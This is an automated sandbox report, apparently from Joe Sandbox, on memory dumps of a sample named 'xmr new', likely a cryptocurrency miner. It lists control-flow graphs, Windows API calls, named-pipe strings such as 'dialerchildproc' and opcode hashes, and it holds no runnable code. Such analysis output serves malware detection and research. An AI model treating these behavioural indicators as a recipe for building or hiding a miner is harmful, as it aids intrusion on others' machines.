                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                          • API String ID: 190073905-1786718095
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: 3afed94fe1932683d9cb87716e517d54191ff98dd7d33d4894b132dade25bd57
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: 0F81C1316802C186F654BF6598733DF62E3EB45F80F588427EF0543796DB38C8A9878A

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 12c42a8ce28-12c42a8ce4a GetLastError 255 12c42a8ce69-12c42a8ce74 FlsSetValue 254->255 256 12c42a8ce4c-12c42a8ce57 FlsGetValue 254->256 257 12c42a8ce76-12c42a8ce79 255->257 258 12c42a8ce7b-12c42a8ce80 255->258 259 12c42a8ce59-12c42a8ce61 256->259 260 12c42a8ce63 256->260 261 12c42a8ced5-12c42a8cee0 SetLastError 257->261 262 12c42a8ce85 call 12c42a8d6cc 258->262 259->261 260->255 263 12c42a8cef5-12c42a8cf0b call 12c42a8c748 261->263 264 12c42a8cee2-12c42a8cef4 261->264 265 12c42a8ce8a-12c42a8ce96 262->265 276 12c42a8cf28-12c42a8cf33 FlsSetValue 263->276 277 12c42a8cf0d-12c42a8cf18 FlsGetValue 263->277 267 12c42a8cea8-12c42a8ceb2 FlsSetValue 265->267 268 12c42a8ce98-12c42a8ce9f FlsSetValue 265->268 271 12c42a8ceb4-12c42a8cec4 FlsSetValue 267->271 272 12c42a8cec6-12c42a8ced0 call 12c42a8cb94 call 12c42a8d744 267->272 270 12c42a8cea1-12c42a8cea6 call 12c42a8d744 268->270 270->257 271->270 272->261 282 12c42a8cf35-12c42a8cf3a 276->282 283 12c42a8cf98-12c42a8cf9f call 12c42a8c748 276->283 280 12c42a8cf1a-12c42a8cf1e 277->280 281 12c42a8cf22 277->281 280->283 285 12c42a8cf20 280->285 281->276 287 12c42a8cf3f call 12c42a8d6cc 282->287 288 12c42a8cf8f-12c42a8cf97 285->288 290 12c42a8cf44-12c42a8cf50 287->290 291 12c42a8cf62-12c42a8cf6c FlsSetValue 290->291 292 12c42a8cf52-12c42a8cf59 FlsSetValue 290->292 293 12c42a8cf6e-12c42a8cf7e FlsSetValue 291->293 294 12c42a8cf80-12c42a8cf8a call 12c42a8cb94 call 12c42a8d744 291->294 295 12c42a8cf5b-12c42a8cf60 call 12c42a8d744 292->295 293->295 294->288 295->283
                          APIs
                          • GetLastError.KERNEL32 ref: 0000012C42A8CE37
                          • FlsGetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CE4C
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CE6D
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CE9A
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CEAB
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CEBC
                          • SetLastError.KERNEL32 ref: 0000012C42A8CED7
                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CF0D
                          • FlsSetValue.KERNEL32(?,?,00000001,0000012C42A8ECCC,?,?,?,?,0000012C42A8BF9F,?,?,?,?,?,0000012C42A87AB0), ref: 0000012C42A8CF2C
                            • Part of subcall function 0000012C42A8D6CC: HeapAlloc.KERNEL32 ref: 0000012C42A8D721
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CF54
                            • Part of subcall function 0000012C42A8D744: HeapFree.KERNEL32 ref: 0000012C42A8D75A
                            • Part of subcall function 0000012C42A8D744: GetLastError.KERNEL32 ref: 0000012C42A8D764
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CF65
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000012C42A90A6B,?,?,?,0000012C42A9045C,?,?,?,0000012C42A8C84F), ref: 0000012C42A8CF76
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Value$ErrorLast$Heap$AllocFree
                          • String ID:
                          • API String ID: 570795689-0
                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction ID: 4ed26be3c186423fa5eb1a0fc6ab54651fefbe7a9a50c6c12d2f89376e73f80e
                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                          • Instruction Fuzzy Hash: 50415B302C16C441FA6CB73555773EF6283DF847B0F540727AF36966E6DA6888368A82

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                          • API String ID: 2171963597-1373409510
                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction ID: 1eb21a33f285ff42c9f83246a180badd5b5f03765cb9ae187fb58a29b6585959
                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                          • Instruction Fuzzy Hash: 83217132654B8082FB10AB25F4653AE73A2F784BA4F544616EF5903BA8DF3CC159CB41

                           Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction ID: 7f3ffcbb88a06e9c3ed21bfce5406524e7c832041270061785eaa6f89815ac13
                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction Fuzzy Hash: D0E1BE32A44B818AFB60EF25D4923DE77A2F745B88F100117EF8957B99CB34D1A1C786

                           Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction ID: 676c2d1a8afc96c360d575e9c3168504a8b1671d6b2dbcdb9d2a1d591c9f8cf0
                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                          • Instruction Fuzzy Hash: 62E180726447C08AFB20EF65D4523DE77A6FB45798F100116EF8957B9ACB38D0A2C782

                           Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3013587201-537541572
                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction ID: 2c88a65323b5f662659b879fcba8249b74b5637199f3fdebb6316d1bfa59371c
                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction Fuzzy Hash: 34410632351A8151FA16EB16A8267DF2393FB44BE0F5945279F0A87784EE38C4668392

                           Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction ID: 760965092377fb4adc3a08c7586275374c8e757d1a8fcd1bec86bc6be14be78d
                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction Fuzzy Hash: 0D414B32614BC486E760DF21E4593AE77A2F388B98F44812ADF8A07B58DF38C459CB41

                          Control-flow Graph

                          APIs
                          • FlsGetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D087
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D0A6
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D0CE
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D0DF
                          • FlsSetValue.KERNEL32(?,?,?,0000012C42A8C7DE,?,?,?,?,?,?,?,?,0000012C42A8CF9D,?,?,00000001), ref: 0000012C42A8D0F0
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Value
                          • String ID: 1%$Y%
                          • API String ID: 3702945584-1395475152
                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction ID: 4f76f3cc8ebdb3dcc42fa4363b001678604c658079b9374f96d3221b4c91fd4b
                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction Fuzzy Hash: 32116D30684AC441FA68B73565773EF6153DF843F0F5443369E3A976DADA68C4238282
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: e14f6248c28123d33cbaabb309b265c3305b7a2736bebeaa0ed282603e2a38b8
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: E581A2386802C186FA54BB679C733EF6293EB45B80F1844A79F4547796EB38C46787C2
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction ID: e2e3f91595bdee96af2ee3062ec5c75aa6f84a48478709663796f5becd8c8140
                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction Fuzzy Hash: 0B31E732352781D1FE11FB02A5227DE2696FB48BA0F590927DF1E07790DF38C4668796
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction ID: b84fd1c5d0e28faa360a00c65425da7c565ad9ae7b2bfcbd07e15caa41d9dbbc
                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction Fuzzy Hash: DB118131250A8082F750AB13E86535EA7A6FB88FE4F184616EF19877A4CB38C4248B81
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID: wr
                          • API String ID: 1092925422-2678910430
                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction ID: 0a086ebb96fc1af9a6e97ed6a5e9533a460bb44902e6c03c5c81d4fcbb3732d2
                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction Fuzzy Hash: D3115E3674478182FF14AB12E4256AEA2A2FB48F85F48442ADF8907754EF3DC516C745
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                          • Instruction ID: 5b89a599962f546c22f3cbf455a3cafc1a5b9c925d440eb7926f9e0b9e9d88f6
                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                          • Instruction Fuzzy Hash: 07D17676245B8882EA70AB06E4A539F77A1F788B84F110117EFCD47BA5DF38C561CB81
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: dialer
                          • API String ID: 756756679-3528709123
                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction ID: 5dbd69ec98a744c86b0f80f098f1e64e70ed06da052b2154bee357fe9c8ca8d4
                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction Fuzzy Hash: 6031BF32741BD182FB10EF16A5667AFA7A2FB44B84F0844229F4847B55EF34C8B6C781
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Value$ErrorLast
                          • String ID:
                          • API String ID: 2506987500-0
                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction ID: 813613f83cbce4da28114097403ffca210a6fe5f7a263672513748d064f1e386
                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction Fuzzy Hash: 53118E302806C041FA68B33165773AF6153EF847F0F540727AF36976D6DE6888338682
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction ID: b23167ff50555e8e02f2993d7f19ad741d1cdbd885f5b7be149600ee3342f79c
                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction Fuzzy Hash: F9015B31740A8082FA10EB53E46939EA3A2FB88FC0F584436DF9943754DE3CC55AC781
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction ID: 6df0b4ef28460142799fc1041bd1d58be44ba9417cd3aa82d3e55ca43eacd739
                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction Fuzzy Hash: EB015E7575178086FB24AB12E86A79F62A2FB44B85F084426CF4907765EF3CC1288781
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 9c8ed4415c8a3fbd65cc7b90ffe9f318bb2375ba60db3e9658bffe4ca02c2804
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: C851E73274528286FB94EF15E859BAE3797F344B88F108526DF0743788DB35C866C78A
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: 6ad2d857c3528e7a443b570d882572c027568fd622d80878d4a35996c227118c
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: BA31F43128068186F754FF12E86A79F37A6F744BC8F048416EF4603788DB39C966C78A
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction ID: 82df1c7a25760e5decefe7f847fcfe90ecb9c3d0903a131b87cdd059c3547151
                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction Fuzzy Hash: 6EF0817230068092F720AB22E8A539F6362F748B88F884022CF4947554DA3CC69DCB41
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction ID: efb3a7d5b582c7375fe703f790bbbf76817efd99412887909904636c7d20a381
                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction Fuzzy Hash: 51F08230744BC482FA00AB13B92519FA262EB48FC0F085572EF5647B18DF3CC4659741
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction ID: 790e6fc5066d5bb7b9fd08a4acc6e85c1e69a4e702675ff02fd8da2b0eaedf3c
                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction Fuzzy Hash: 81F09C7135178481FB10AB25E86639F5362EB88BA5F540A17CF6A452F4DF3CC469D381
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                          • Instruction ID: af1eb65154cb9ab694c7e2680f01428a93ee157aff2e5e19281cc9b225d42823
                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                          • Instruction Fuzzy Hash: B802B436259BC486EB60DB55E4A539FB7A2F384790F100016EF8E87BA8DF78C495CB41
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                          • Instruction ID: dc88292a9b34a9bea5fe7c9c4e7fda35c727112ba8af89f3c0c9f14efd69d127
                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                          • Instruction Fuzzy Hash: EA61F736558A80C6F760AB15E46535FB7A2F388784F510117EF8E43BA8CB78C4618B81
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 76851ab78bee6c37ac8d53a068aec2354e1cd4fee4e7827af34db0ce6c05083b
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 4F11E7326D0AC209FA583128E4733EF90836B58374F78462AAF76062D6CA64C9B44183
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 0728c804e2fd899d87f1ac3da6580149c85963ef1c193439c6b5bcd8643b4682
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 5311EB32AD0BC012F664355AD4773EF11436B783B4F284E26AF762B7D6CA24C4686582
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                          • API String ID: 3215553584-4202648911
                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction ID: 72d3a4f6b16cf5c90b06f0b782e555c1e56e81c9b85a5c4d9d42ad5e3c549d6d
                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction Fuzzy Hash: EB61E5325A06C082FA65BB68E4733EF66A3F751780F544417DF0A877A4DBB4C86582C3
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: bd79a731f0e787fe24cbf3ad6c694b4e75376b5f7d5a36f09758c1d052d502bc
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 7D618F73600B848AFB10EF65D4913DE77A2F744B88F044216EF8917B99DB78C5A6C781
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
